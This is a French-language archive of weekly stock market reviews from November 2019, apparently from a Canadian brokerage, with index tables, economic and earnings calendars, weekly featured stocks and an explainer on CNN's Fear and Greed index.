Dow Jones 27875,62 -129,27 -0,46%
Pétrole 57,77 0,05 0,09%
Or 1463,599 -4,90 -0,33%
CAD/USD 0,752 -0,0046 -0,61%

Source : Bloomberg

 

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
  Croissance des profits En hausse
     
Bourse américaine Perspectives à court terme En hausse
  Croissance des profits En hausse

Source : VectorVest

 

Ce que nous réserve la semaine du 25 novembre au 29 novembre 2019

Nouvelles économiques

Mardi : États-Unis, Niveau de confiance des consommateurs

Mercredi : États-Unis, L’Indice des Directeurs d’Achat de Chicago (PMI)

Jeudi : Canada, Balance du compte courant

Vendredi :  Canada, PIB m/m

 

Compagnies publiant leurs résultats :

Lundi : Agilent Technologies Inc.

Mardi : Bank of Nova Scotia, Best Buy Co Inc, Dollar Tree Inc, Autodesk

Mercredi : BRP Inc. (Bombardier Produits récréatifs)

Jeudi: Canadian Tire Corporation Limited, Banque de Montréal

 

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre Roper Industries inc.. Roper, constituée le 17 décembre 1981, est une société diversifiée qui conçoit, fabrique et distribue des produits et logiciels dans quatre secteurs d’activité: imagerie médicale et scientifique, systèmes et contrôles d’énergie, technologie industrielle et technologie radiofréquence. Pour l’année 2018, l’organisation a enregistré des revenus de 5,2 milliards et la marge brute a augmenté de 60 points de base pour atteindre les 63,2%. La compagnie verse un dividende de 0,58%.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

Salutations,

revue boursière de la semaine terminée le 15 novembre 2019

Le meilleur marché haussier de l’histoire!


Le marché haussier se distingue tant par sa durée que par son ampleur. La montée actuelle du marché, qui a débuté le 9 mars 2009, a enregistré un gain impressionnant de 472% pour le S&P 500, faisant de cette hausse un record historique. Selon le Groupe Leuthold.

 

À plus de 10 ans du creux de la crise financière, le marché n’a toujours pas perdu son élan, il est actuellement à son niveau le plus élevé, stimulé par de nouveaux espoirs de résolution du commerce entre les États-Unis et la Chine.

Notamment, pour la première fois de son histoire, le Dow Jones a clôturé au-dessus de 28 000 points.

La combinaison d’une Réserve fédérale accommodante, d’une meilleure perspective de croissance mondiale pour 2020 et des bénéfices supérieurs aux attentes des entreprises sont des facteurs clés. De plus, les signes d’un marché du travail américain vigoureux et d’une amélioration du secteur du logement ont permis d’atténuer certaines inquiétudes.

L’indice  S&P 500 se vend actuellement 20 fois les profits des compagnies qui le composent, ce qui est au-dessus de la moyenne historique de 16 fois les profits. Selon Jean-Paul Giacometti, c’est le bas niveau des taux d’intérêt qui justifie le multiple de 20 et ce prix. Il juge que c’est plutôt le marché obligataire qui pourrait être considéré comme une bulle présentement et reste confiant dans le court terme à cause des élections américaines.

Revue de la semaine terminée le 15 novembre 2019

L’indice principal du Canada a amorcé la semaine sur une note positive lundi, grâce à la vigueur des actions technologiques. Mardi, le discours du président américain Trump a stimulé les marchés et le TSX a clôturé encore plus haut. Mercredi, un secteur aurifère optimiste a permis au TSX de clôturer à la hausse à nouveau. Le Dow a augmenté de 0,3%, le S&P 500 s’est amélioré de 0,1% et le Nasdaq a glissé de 0,1%. Une reprise des valeurs immobilières et des services publics a conduit le principal indice du Canada à clôturer à la hausse jeudi. Les déclarations d’un responsable américain selon lesquelles un accord commercial avec la Chine était sur le point d’être signé ont inspiré les acheteurs et la Bourse de Toronto a clôturé en hausse vendredi. Le Dow a progressé de 0,8%, le S&P 500 de 0,8% et le Nasdaq de 0,7%. Après avoir clôturé à la hausse pendant les cinq séances de négociation cette semaine, les actions canadiennes ont terminé avec une victoire globale.

  Valeur au 15 novembre Variation de la semaine Variation de la semaine %
TSX 17028,47 151,05 0,89%
Dow Jones 28004,89 323,65 1,17%
Pétrole 57,72 0,48 0,84%
Or 1468,5 5,60 0,38%
CAD/USD 0,756 0,0004 0,05%

Source : Bloomberg

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
  Croissance des profits En hausse
     
Bourse américaine Perspectives à court terme En hausse
  Croissance des profits En hausse

Source : VectorVest

 

Ce que nous réserve la semaine du 18 novembre au 22 novembre 2019

Nouvelles économiques

Lundi : États-Unis, Indice du marché du logement

Mardi : États-Unis, Permis de construire et mise en chantier

Mercredi : États-Unis, les stocks de pétrole brut

Jeudi : Canada, Changement d’emploi non agricole

Vendredi :  Canada, Ventes au détail de base m / m

Compagnies publiant leurs résultats :

Lundi : Analog Devices inc.

Mardi : Home Depot Inc, George Weston limited

Mercredi : Target Corp, Metro inc.

Jeudi: Gap inc.

Vendredi: Foot Locker inc.

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre Home Capital Group Inc. Par l’intermédiaire de sa filiale, Home Trust Company, fournit des services de dépôt, de prêt hypothécaire, de crédit aux particuliers et de cartes de paiement au Canada. La société propose une gamme de produits de dépôt, notamment des certificats de dépôt, des certificats de placement garantis, des régimes enregistrés d’épargne-retraite et des fonds enregistrés de revenu de retraite. La compagnie a vu ses ventes croitre de 11% dans la dernière année et a un retour sur ses capitaux propres de 7,16%.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

Salutations,

revue boursière de la semaine terminée le 8 novembre 2019

Un indice pour mesurer la peur et la cupidité dans le marché

CNN a mis au point l’indice de la peur et de la cupidité pour mesurer quotidiennement, hebdomadairement, mensuellement et annuellement, deux des principales émotions présentes sur le marché. Cet indice reflète le montant que les investisseurs sont disposés à payer pour leurs actions.

En théorie, l’indice peut être utilisé pour déterminer si le prix du marché boursier est juste. Il est basé sur la logique selon laquelle une peur excessive tend à faire baisser les cours des actions et qu’une trop grande cupidité a tendance à avoir l’effet inverse.

CNN examine sept facteurs différents pour déterminer le degré de peur et de cupidité sur le marché. Ils sont:

1. Le momentum du cours des actions: Prix de l’indice S & P 500 par rapport à sa moyenne mobile sur 125 jours. Le S & P 500 est supérieur de 5,07% à sa moyenne des 125 jours, ce qui peut être vu comme de la cupidité.

2. Force du prix des actions : Calcul du nombre d’actions ayant atteint des sommets en 52 semaines par rapport à celles ayant atteint leur niveau le plus bas en 52 semaines à la Bourse de New York (NYSE). Il y a présentement plus d’action touchant leur sommet sur le marché.

3. Étendue du cours des actions: Analyse des volumes de négociation des actions en hausse par rapport aux actions en baisse.

4. Options d’achat et de vente: Au cours des cinq derniers jours, le volume des options de vente est en retard de 53,94% par rapport au volume des options

d’achat, les investisseurs faisant des paris haussiers dans leurs portefeuilles.

5. Demande pour les obligations risquées: Analyse l’appétit du risque mesurant l’écart entre les rendements des obligations de qualité supérieure et des obligations à haut rendement.

6. Volatilité du marché: CNN mesure l’indice de volatilité du Chicago Board Options Exchange (VIX), en se concentrant sur une durée de 50 jours. L’indice de volatilité est à 12.07. Cette lecture est neutre et indique que les risques de marché semblent faibles.

7. Demande de valeur refuge: Les actions ont surperformé les obligations de 5,63 points de pourcentage au cours des 20 derniers jours. Cette performance est proche de la plus forte performance des actions par rapport aux obligations au cours des deux dernières années et indique que les investisseurs se tournent vers les actions, ce qui est signe de cupidités.

L’indice est présentement à son plus haut depuis presque 2 ans. Les sommets de cupidité sont généralement également des sommets pour le cours des actions. Par exemple, pour le premier rectangle, l’indice S&P 500 a baissé d’un peu moins de 10% de janvier 2018 à mars 2018. Pour le deuxième rectangle, le &P 500 à baissé de 15% d’octobre 2018 à décembre 2018.

Revue de la semaine terminée le 8 novembre 2019

La hausse du secteur de l’énergie a aidé le TSX à commencer la semaine sur une note positive. La dynamique haussière s’est poursuivie mardi, propulsée par les gains des actions énergétiques et financières. L’indice principal du Canada a clôturé à la hausse en milieu de semaine, grâce à l’appui du secteur miniers et du secteur de la consommation. L’appétit pour le risque des investisseurs est revenu jeudi à la suite de l’annonce par les États-Unis et la Chine de la suppression progressive des droits de douane. Le Dow a progressé de 0,7% et le S&P500 et le NASDAQ ont augmenté de 0,3%. Les actions canadiennes ont encore augmenté vendredi, entraînées par la hausse des titres des secteurs de la santé et des technologies. Après avoir clôturé à la hausse cinq jours sur cinq, les actions canadiennes ont enregistré un gain global cette semaine.

Ce que nous réserve la semaine du 11 novembre au 15 novembre 2019

Nouvelles économiques

Mardi : États-Unis, Taux de prêts hypothécaires impayés

Mercredi : États-Unis, solde budget fédéral, Indice des prix à la consommation

Jeudi : États-Unis, les stocks de pétrole brut et stockage de gaz naturel

Vendredi : Canada, Bilan d’achats de titres étrangers

Compagnies publiant leurs résultats :

Lundi : Tencent Holdings

Mardi : ADT Inc, CCL Industries, NFI Group

Mercredi : Applied Materials Inc, Uni Select Inc, Loblaw Companies Ltd

Jeudi: Walmart Inc, Canopy Growth, Brookfield Asset Management Inc

Sur notre radar cette semaine

Cette semaine nous vous proposons comme titre Regeneron Pharmaceuticals. Regeneron est une société biopharmaceutique intégrée qui découvre, invente, met au point, fabrique et commercialise des médicaments destinés au traitement de maladies graves. Fondée par des médecins et scientifiques il y a plus de 30 ans, l’entreprise commercialise sept médicaments approuvés par la FDA et développe de nombreux produits, notamment pour le cancer, l’asthme, la douleur et les maladies infectieuses.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.


Salutations,